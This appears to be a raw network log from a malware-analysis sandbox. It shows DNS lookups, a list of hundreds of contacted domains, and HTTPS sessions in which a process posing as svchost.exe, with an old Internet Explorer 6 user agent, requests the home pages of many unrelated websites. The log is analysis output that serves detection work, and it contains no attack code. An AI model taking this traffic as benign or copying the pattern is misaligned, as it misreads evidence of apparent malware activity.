Mar 22, 2023 05:45:56.644330025 CET	8.8.8.8	192.168.2.5	0x3c7a	No error (0)	dbnet.at		188.94.254.88	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.653312922 CET	8.8.8.8	192.168.2.5	0xefbb	No error (0)	www.muhr-soehne.de		5.189.171.125	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.661851883 CET	8.8.8.8	192.168.2.5	0xd522	No error (0)	fogra.com.pl		85.128.55.51	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.667208910 CET	8.8.8.8	192.168.2.5	0xf4df	No error (0)	bosado.com		5.39.75.157	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

diamir.de

www.muhr-soehne.de

www.diamir.de

sigtoa.com

orlyhotel.com

ldh.la.gov

hyab.se

techtrans.de

pleszew.policja.gov.pl

nts-web.net

flamingorecordings.com

clinicasanluis.com.co

hyab.com

dataform.co.uk

www.quadlock.com

www.olras.com

www.dgmna.com

www.jenco.co.uk

www.pdqhomes.com

www.mqs.com.br

www.rs-ag.com

www.item-pr.com

www.baijaku.com

www.pr-park.com

www.alteor.cl

www.valdal.com

www.depalo.com

www.elpro.si

www.credo.edu.pl

www.vazir.se

www.nunomira.com

www.nelipak.nl

www.petsfan.com

www.otena.com

www.transsib.com

www.tvtools.fi

www.evcpa.com

www.edimart.hu

www.t-tre.com

www.abart.pl

www.vexcom.com

www.xaicom.es

www.hummer.hu

www.pcgrate.com

www.abdg.com

www.naoi-a.com

www.cokocoko.com

www.waldi.pl

www.synetik.net

www.aevga.com

www.ora.ecnet.jp

www.sjbs.org

www.holleman.us

www.yocinc.org

www.stnic.co.uk

www.fink.com

www.netcr.com

www.maktraxx.com

www.speelhal.net

www.jacomfg.com

www.findbc.com

www.cel-cpa.com

www.gpthink.com

www.lrsuk.com

www.jchysk.com

www.mobilnic.net

www.nqks.com

www.c9dd.com

www.fe-bauer.de

www.domon.com

www.dayvo.com

www.myropcb.com

www.pwd.org

www.vitaindu.com

www.stajum.com

www.kernsafe.com

www.valselit.com

www.iamdirt.com

www.pupi.cz

www.yoruksut.com

www.wifi4all.nl

www.2print.com

www.fcwcvt.org

www.x0c.com

www.snugpak.com

www.photo4b.com

www.crcsi.org

www.ora-ito.com

www.medius.si

www.ka-mo-me.com

www.com-sit.com

www.railbook.net

www.tyrns.com

www.spanesi.com

www.tc17.com

www.fnsds.org

www.pohlfood.com

www.11tochi.net

www.pb-games.com

www.sclover3.com

karila.fr

themark.org

hchc.org

muhr-soehne.de

vvsteknik.dk

stopllc.com

strazynski.pl

touchfam.ca

okashimo.com

top1oil.com

cpmteam.com

sinwal.com

ifesnet.com

dhh.la.gov

bggs.com

shanks.co.uk

webavant.com

yhsll.com

kursavto.ru

eos-i.com

gcss.com

rokoron.com

k-nikko.com

insia.com

cutchie.com

hamaker.net

isom.org

tabbles.net

dspears.com

hes.pt

envogen.com

jabian.com

cbaben.com

snf.it

kayoaiba.com

absblast.com

semuk.com

onzcda.com

daytonir.com

dbnet.at

rkengg.com

apcotex.com

metaforacom.com

atbauk.org

x96.com

bossinst.com

rast.se

reproar.com

kallman.net

sidepath.com

dyag-eng.com

sgk.home.pl

mackusick.de

nlcv.bas.bg

tozzhin.com

iranytu.net

zugseil.com

adventist.ro

beafin.com

nettle.pl

mackusick.com

agulatex.com

ascc.org.au

skypearl.com

web-york.com

nekono.net

sjbmw.com

epc.com.au

nettlinx.org

likangds.com

kumaden.com

ramkome.com

impexnc.com

indonesiamedia.com

fundeo.com

dayvo.com

magicomm.co.uk

xult.org

portoccd.org

coxkitchensandbaths.com

com-edit.fr

vdoherty.com

karmy.com.pl

skgm.ru

a-domani.com

any-s.net

btsi.com.ph

scintel.com

gbmfg.com

holp-ai.com

wnit.org

acraloc.com

dog-jog.net

zupraha.cz

pers.com

oh28ya.com

ossir.org

wanoa.com

sokuwan.net

gujarat.com

peminet.net

anduran.com

vivastay.com

komie.com

kustnara.com

4locals.net

cbras.com

geecl.com

t-trust.jp

tbvlugus.nl

aluminox.es

juso-gr.ch

ntc.edu.au

floopis.com

refintl.org

amic.at

siongann.com

aba.org.eg

vonparis.com

biurohera.pl

assideum.com

amerifor.com

unicus.jp

fortknox.bm

shiner.com

vfcindia.com

pellys.co.uk

keio-web.com

cubodown.com

simetar.com

ludomemo.com

kavram.com

jnf.at

nrsi.com

noblesse.be

redgiga.com

banvari.com

pccj.net

tcpoa.com

riwn.org

fogra.com.pl

atb-lit.com

aoinko.net

kewlmail.com

sledsport.ru

jsaps.com

angework.com

duiops.net

s5w.com

ccssinc.com

univi.it

arowines.com

infotech.pl

orbitgas.com

smitko.net

wantapc.net

alexpope.biz

mikihan.com

roewer.de

oozkranj.com

workplus.hu

bidroll.com

e-kami.net

zemarmot.net

mcseurope.nl

pcoyuncu.com

paraski.org

invictus.pl

bd-style.com

hazmatt.com

forbin.net

missnue.com

wvs-net.de

icd-host.com

shteeble.com

umcor.am

pertex.com

adeesa.net

johnlyon.org

araax.com

bount.com.tw

sanfotek.net

popbook.com

valselit.com

ncn.de

cjcagent.com

shesfit.com

revoldia.net

lyto.net

aiolos-sa.gr

webways.com

cjborden.com

cyclad.pl

akdeniz.nl

htsmx.net

captlfix.com

softizer.com

bible.org

shenhgts.net

kairel.com

hubbikes.com

canasil.com

shittas.com

ftmobile.com

mijash3.com

midap.com

gydrozo.ru

msl-lock.com

mondopp.net

avse.hu

yoruksut.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	50143	138.201.65.187	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	Direction	Data
2023-03-22 04:44:25 UTC	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: diamir.de
2023-03-22 04:44:26 UTC	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 22 Mar 2023 04:44:25 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.diamir.de/ Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
2023-03-22 04:44:26 UTC	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.5	50153	5.189.171.125	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:44:25 UTC	0	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: www.muhr-soehne.de
2023-03-22 04:44:26 UTC	0	IN	HTTP/1.1 200 OK Date: Wed, 22 Mar 2023 04:44:25 GMT Server: Apache/2.4.38 (Debian) Last-Modified: Thu, 02 Mar 2023 15:05:19 GMT Accept-Ranges: bytes Content-Length: 51841 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
2023-03-22 04:44:26 UTC	1	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 64 65 22 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 21 2d 2d 20 0a 09 6d 61 64 65 20 62 79 20 50 53 56 6e 65 6f 0a 0a 09 54 68 69 73 20 77 65 62 73 69 74 65 20 69 73 20 70 6f 77 65 72 65 64 20 62 79 20 54 59 50 4f 33 20 2d 20 69 6e 73 70 69 72 69 6e 67 20 70 65 6f 70 6c 65 20 74 6f 20 73 68 61 72 65 21 0a 09 54 59 50 4f 33 20 69 73 20 61 20 66 72 65 65 20 6f 70 65 6e 20 73 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 20 46 72 61 6d 65 77 6f 72 6b 20 69 6e 69 74 69 61 6c 6c 79 20 63 72 65 61 74 65 64 20 62 79 20 4b 61 73 70 65 72 20 53 6b 61 61 72 68 6f 6a 20 Data Ascii: <!DOCTYPE html><html dir="ltr" lang="de"><head><meta charset="utf-8">... made by PSVneoThis website is powered by TYPO3 - inspiring people to share!TYPO3 is a free open source Content Management Framework initially created by Kasper Skaarhoj
2023-03-22 04:44:26 UTC	17	IN	Data Raw: 20 20 20 20 20 20 20 56 65 72 73 63 68 6c 69 65 c3 9f 6d 61 73 63 68 69 6e 65 6e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 20 6c 61 79 6f 75 74 2d 30 20 20 22 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 76 65 72 73 63 68 6c 69 65 Data Ascii: Verschliemaschinen </a> </li> <li class="nav-item layout-0 "> <a href="/verschlie
2023-03-22 04:44:26 UTC	33	IN	Data Raw: 66 72 61 6d 65 2d 6c 61 79 6f 75 74 2d 30 20 20 20 6d 74 2d 30 20 6d 62 2d 30 0a 20 20 20 20 0a 0a 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 6c 2d 33 20 63 6f 6c 2d 6c 67 2d 36 20 63 6f 6c 2d 6d 64 2d 36 20 63 6f 6c 2d 73 6d 2d 31 32 20 63 6f 6c 2d 31 32 20 6d 79 2d 34 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 65 72 76 69 63 65 62 6f 78 20 68 2d 31 30 30 20 62 67 2d 6c 69 67 68 74 2d 67 72 65 79 20 64 2d 66 6c 65 78 20 66 6c 65 78 2d 63 6f 6c 75 6d 6e 20 68 2d 31 30 30 20 77 2d 31 30 30 20 70 2d 33 20 22 3e 0a Data Ascii: frame-layout-0 mt-0 mb-0 "> <div class="row"> <div class="col-xl-3 col-lg-6 col-md-6 col-sm-12 col-12 my-4"> <div class="servicebox h-100 bg-light-grey d-flex flex-column h-100 w-100 p-3 ">
2023-03-22 04:44:26 UTC	49	IN	Data Raw: 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 2d 63 65 6e 74 65 72 20 6d 79 2d 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 78 2d 30 20 6d 78 2d 6d 64 2d 35 20 6d 79 2d 32 20 6d 79 2d 6d 64 2d 30 22 20 69 74 65 6d 70 72 6f 70 3d 22 69 74 65 6d 4c 69 73 74 45 6c 65 6d 65 6e 74 22 20 69 74 65 6d 73 63 6f 70 65 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 4c 69 73 74 49 74 65 6d 22 20 61 72 69 61 2d 63 75 72 72 65 6e 74 3d 22 70 61 67 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 Data Ascii: justify-content-center my-3"> <li class="mx-0 mx-md-5 my-2 my-md-0" itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem" aria-current="page"> <a hr

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.5	50274	49.212.235.175	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:44:31 UTC	68	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: nts-web.net

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.5	50319	35.214.171.193	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:44:36 UTC	116	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: flamingorecordings.com
2023-03-22 04:44:36 UTC	117	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 22 Mar 2023 04:44:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding SG-F-Cache: HIT X-Httpd-Modphp: 1 Host-Header: 8441280b0c35cbc1147f8ba998a563a7 X-Proxy-Cache: HIT
2023-03-22 04:44:36 UTC	117	IN	Data Raw: 38 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 76 69 65 77 70 6f 72 74 27 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 27 20 2f 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 27 20 63 6f 6e 74 65 6e 74 3d 27 49 45 3d 65 64 67 65 27 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 20 2f 3e 3c 74 69 74 6c Data Ascii: 8000<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name='viewport' content='width=device-width, initial-scale=1.0' /><meta http-equiv='X-UA-Compatible' content='IE=edge' /><link rel="profile" href="https://gmpg.org/xfn/11" /><titl
2023-03-22 04:44:36 UTC	133	IN	Data Raw: 5f 31 32 30 30 70 78 2d 33 30 30 78 33 30 30 2e 70 6e 67 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6d 73 61 70 70 6c 69 63 61 74 69 6f 6e 2d 54 69 6c 65 49 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 66 6c 61 6d 69 6e 67 6f 72 65 63 6f 72 64 69 6e 67 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 31 37 2f 31 31 2f 46 6c 61 6d 69 6e 67 6f 5f 4c 6f 67 6f 5f 53 74 69 63 6b 65 72 5f 42 69 72 64 5f 31 32 30 30 70 78 2d 33 30 30 78 33 30 30 2e 70 6e 67 22 20 2f 3e 20 3c 73 74 79 6c 65 20 69 64 3d 22 77 70 2d 63 75 73 74 6f 6d 2d 63 73 73 22 3e 20 2e 66 6c 2d 70 6f 73 74 2d 67 72 69 64 2d 70 6f 73 74 7b 0a 20 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 0a 7d 0a 2e 72 65 6c 65 61 73 65 7b 0a 20 70 6f 73 69 Data Ascii: _1200px-300x300.png" /><meta name="msapplication-TileImage" content="https://flamingorecordings.com/wp-content/uploads/2017/11/Flamingo_Logo_Sticker_Bird_1200px-300x300.png" /> <style id="wp-custom-css"> .fl-post-grid-post{ border:none;}.release{ posi
2023-03-22 04:44:36 UTC	149	IN	Data Raw: 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 50 65 72 73 6f 6e 22 3e 3c 6d 65 74 61 20 69 74 65 6d 70 72 6f 70 3d 22 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 66 6c 61 6d 69 6e 67 6f 72 65 63 6f 72 64 69 6e 67 73 2e 63 6f 6d 2f 61 75 74 68 6f 72 2f 61 64 6d 69 6e 2f 22 20 2f 3e 3c 6d 65 74 61 20 69 74 65 6d 70 72 6f 70 3d 22 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 64 6d 69 6e 22 20 2f 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 69 74 65 6d 70 72 6f 70 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 53 74 61 74 69 73 74 69 63 22 20 69 74 65 6d 73 63 6f 70 65 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 49 6e 74 65 72 61 63 74 69 6f 6e 43 6f 75 6e 74 65 72 22 3e 3c 6d Data Ascii: type="https://schema.org/Person"><meta itemprop="url" content="https://flamingorecordings.com/author/admin/" /><meta itemprop="name" content="admin" /></div><div itemprop="interactionStatistic" itemscope itemtype="https://schema.org/InteractionCounter"><m
2023-03-22 04:44:36 UTC	165	IN	Data Raw: 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 4f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 3e 3c 6d 65 74 61 20 69 74 65 6d 70 72 6f 70 3d 22 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 46 6c 61 6d 69 6e 67 6f 20 52 65 63 6f 72 64 69 6e 67 73 22 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 69 74 65 6d 73 63 6f 70 65 20 69 74 65 6d 70 72 6f 70 3d 22 61 75 74 68 6f 72 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 50 65 72 73 6f 6e 22 3e 3c 6d 65 74 61 20 69 74 65 6d 70 72 6f 70 3d 22 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 66 6c 61 6d 69 6e 67 6f 72 65 63 6f 72 64 69 6e 67 73 2e 63 6f 6d 2f 61 75 74 68 6f 72 2f 61 64 6d 69 6e 2f 22 20 2f 3e 3c 6d 65 74 61 20 69 Data Ascii: temtype="https://schema.org/Organization"><meta itemprop="name" content="Flamingo Recordings"></div><div itemscope itemprop="author" itemtype="https://schema.org/Person"><meta itemprop="url" content="https://flamingorecordings.com/author/admin/" /><meta i
2023-03-22 04:44:36 UTC	181	IN	Data Raw: 6e 62 6b 4f 58 5f 68 6c 7a 6e 72 64 42 57 48 52 77 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 22 20 3e 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 62 20 66 61 2d 79 6f 75 74 75 62 65 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 3c 2f 69 3e 20 3c 2f 61 3e 20 3c 2f 73 70 61 6e 3e 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 6c 2d 69 63 6f 6e 22 3e 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 69 6e 73 74 61 67 72 61 6d 2e 63 6f 6d 2f 66 6c 61 6d 69 6e 67 6f 72 65 63 6f 72 64 69 6e 67 73 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 22 20 3e 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 62 20 66 61 2d 69 6e 73 74 61 67 72 61 6d 22 20 Data Ascii: nbkOX_hlznrdBWHRw" target="_blank" rel="noopener" > <i class="fab fa-youtube" aria-hidden="true"></i> </a> </span> <span class="fl-icon"> <a href="https://www.instagram.com/flamingorecordings/" target="_blank" rel="noopener" > <i class="fab fa-instagram"

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.5	50328	104.21.66.220	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:44:36 UTC	117	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: clinicasanluis.com.co
2023-03-22 04:44:36 UTC	183	IN	HTTP/1.1 200 OK Date: Wed, 22 Mar 2023 04:44:36 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Expires: Wed, 17 Aug 2005 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Set-Cookie: d55e479f054c94814cbc10d217aaa990=e54cc20c1d7fdf3749e95c6556111923; path=/; HttpOnly Last-Modified: Wed, 22 Mar 2023 04:44:36 GMT CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=BHHL18NSWNhPBQQbT3I%2FqYTetps7Q2N2bM01O0TWaSM5IDU8RHu%2BuLNPdZ9ePOXTIWa8JRZFNHktveYnS07UGcO4O6ZqvLGEFLxEoksM99bOCOIX8%2BKDs8YDusylhGFSaEI62YkP2xk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7abbc7c6daae3a6d-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
2023-03-22 04:44:36 UTC	184	IN	Data Raw: 37 63 35 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 2d 45 53 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 2e 63 6f 6d 2e 63 6f 2f 22 20 Data Ascii: 7c50<!DOCTYPE html><html lang="es-ES" dir="ltr"><head><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta charset="utf-8" /><base href="https://clinicasanluis.com.co/"
2023-03-22 04:44:36 UTC	184	IN	Data Raw: 72 65 66 3d 22 2f 70 6c 75 67 69 6e 73 2f 73 79 73 74 65 6d 2f 72 6f 6b 62 6f 78 2f 61 73 73 65 74 73 2f 73 74 79 6c 65 73 2f 72 6f 6b 62 6f 78 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 6f 64 75 6c 65 73 2f 6d 6f 64 5f 70 6f 70 75 70 61 68 6f 6c 69 63 2f 63 73 73 2f 6a 71 75 65 72 79 2e 67 61 66 61 6e 63 79 62 6f 78 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f Data Ascii: ref="/plugins/system/rokbox/assets/styles/rokbox.css" rel="stylesheet" /><link href="/modules/mod_popupaholic/css/jquery.gafancybox.min.css" rel="stylesheet" /><link href="/media/gantry5/assets/css/font-awesome.min.css" rel="stylesheet" /><link href="/
2023-03-22 04:44:36 UTC	186	IN	Data Raw: 64 69 61 2f 73 79 73 74 65 6d 2f 6a 73 2f 63 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 73 79 73 74 65 6d 2f 6a 73 2f 6d 6f 6f 74 6f 6f 6c 73 2d 63 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 73 79 73 74 65 6d 2f 6a 73 2f 6d 6f 6f 74 6f 6f 6c 73 2d 6d 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 Data Ascii: dia/system/js/core.js?989da4646a1a0dfff9a5685fb6ee36da"></script><script src="/media/system/js/mootools-core.js?989da4646a1a0dfff9a5685fb6ee36da"></script><script src="/media/system/js/mootools-more.js?989da4646a1a0dfff9a5685fb6ee36da"></script><script
2023-03-22 04:44:36 UTC	187	IN	Data Raw: 73 2f 68 74 6d 6c 35 73 68 69 76 2d 70 72 69 6e 74 73 68 69 76 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 65 6e 67 69 6e 65 73 2f 6e 75 63 6c 65 75 73 2f 63 73 73 2f 6e 75 63 6c 65 75 73 2d 69 65 39 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 6a 73 2f 6d 61 74 63 68 6d 65 64 69 61 2e 70 6f 6c 79 66 69 6c 6c 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 Data Ascii: s/html5shiv-printshiv.min.js"></script> <link rel="stylesheet" href="/media/gantry5/engines/nucleus/css/nucleus-ie9.css" type="text/css"/> <script type="text/javascript" src="/media/gantry5/assets/js/matchmedia.polyfill.js"></script>
